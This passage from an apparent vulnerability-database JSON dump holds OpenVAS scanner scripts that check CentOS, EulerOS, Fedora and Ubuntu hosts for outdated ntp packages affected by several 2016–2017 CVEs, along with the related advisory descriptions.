See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882654\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:45:09 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ntp CESA-2017:0252 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ntp\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used to\nsynchronize a computer's time with another referenced time source.\nThese packages include the ntpd service which continuously adjusts system time\nand utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. 
A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0252\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022266.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-perl\", rpm:\"ntp-perl~4.2.6p5~10.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171024", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1024)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1024\");\n script_version(\"2020-01-23T10:44:25+0000\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:44:25 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:44:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1024)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1024\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1024\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2017-1024 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. 
A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\nA flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\nA flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\nA flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\nA flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. 
(CVE-2016-7433)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872098", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-e8a8561ee7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-e8a8561ee7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872098\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:36:56 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-e8a8561ee7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e8a8561ee7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PABKEYX6ABBFJZGMXKH57X756EJUDS3C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "Check the version of ntp", "modified": "2019-03-08T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310882653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882653", "type": "openvas", "title": "CentOS Update for ntp CESA-2017:0252 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ntp CESA-2017:0252 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882653\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:45:01 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ntp CESA-2017:0252 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ntp\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used\nto synchronize a computer's time with another referenced time source.\nThese packages include the ntpd service which continuously adjusts system time\nand utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. 
A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0252\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022267.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-perl\", rpm:\"ntp-perl~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~25.el7.centos.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872099", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-c198d15316", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-c198d15316\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872099\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:01 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-c198d15316\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c198d15316\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ILMSYVQMMF37MANYEO7KBHOPSC74EKGN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-07-14T00:00:00", "id": "OPENVAS:1361412562310843238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843238", "type": "openvas", "title": "Ubuntu Update for ntp USN-3349-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3349_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for ntp USN-3349-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843238\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-14 15:54:52 +0530 (Fri, 14 Jul 2017)\");\n script_cve_id(\"CVE-2016-2519\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\",\n \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9042\",\n \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2017-6458\", \"CVE-2017-6460\", \"CVE-2017-6462\",\n \"CVE-2017-6463\", \"CVE-2017-6464\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ntp USN-3349-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yihan Lian discovered that NTP incorrectly\n handled certain large request data values. A remote attacker could possibly use\n this issue to cause NTP to crash, resulting in a denial of service. This issue\n only affected Ubuntu 16.04 LTS. 
(CVE-2016-2519) Miroslav Lichvar discovered that\n NTP incorrectly handled certain spoofed addresses when performing rate limiting.\n A remote attacker could possibly use this issue to perform a denial of service.\n This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10.\n (CVE-2016-7426) Matthew Van Gundy discovered that NTP incorrectly handled\n certain crafted broadcast mode packets. A remote attacker could possibly use\n this issue to perform a denial of service. This issue only affected Ubuntu 14.04\n LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428) Miroslav\n Lichvar discovered that NTP incorrectly handled certain responses. A remote\n attacker could possibly use this issue to perform a denial of service. This\n issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10.\n (CVE-2016-7429) Sharon Goldberg and Aanchal Malhotra discovered that NTP\n incorrectly handled origin timestamps of zero. A remote attacker could possibly\n use this issue to bypass the origin timestamp protection mechanism. This issue\n only affected Ubuntu 16.10. (CVE-2016-7431) Brian Utterback, Sharon Goldberg and\n Aanchal Malhotra discovered that NTP incorrectly performed initial sync\n calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10.\n (CVE-2016-7433) Magnus Stubman discovered that NTP incorrectly handled certain\n mrulist queries. A remote attacker could possibly use this issue to cause NTP to\n crash, resulting in a denial of service. This issue only affected Ubuntu 16.04\n LTS and Ubuntu 16.10. (CVE-2016-7434) Matthew Van Gundy discovered that NTP\n incorrectly handled origin timestamp checks. A remote attacker could possibly\n use this issue to perform a denial of service. This issue only affected Ubuntu\n Ubuntu 16.10, and Ubuntu 17.04. (CVE-2016-9042) Matthew Van Gundy discovered\n that NTP incorrectly handled certain control mode packets. 
A remote attacker\n could use this issue to set or unset traps. This issue only applied to Ubuntu\n 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9310) Matthew Van Gundy\n discovered that NTP incorrectly handled the trap service. A remote attacker\n could possibly use this issue to cause NTP to crash, resulting in a denial of\n service. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and\n Ubuntu 16.10. (CVE-2016-9311) It was di ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"ntp on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3349-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3349-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p9+dfsg-2ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p8+dfsg-1ubuntu2.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p4+dfsg-3ubuntu5.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2015-7973", "CVE-2015-8158", "CVE-2015-7979", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7431"], "description": "Junos OS is prone to multiple vulnerabilities in NTP.", "modified": "2018-10-26T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310106754", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106754", "type": "openvas", "title": "Junos Multiple NTP Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa10776.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos Multiple NTP Vulnerabilities\n#\n# Authors:\n# Christian 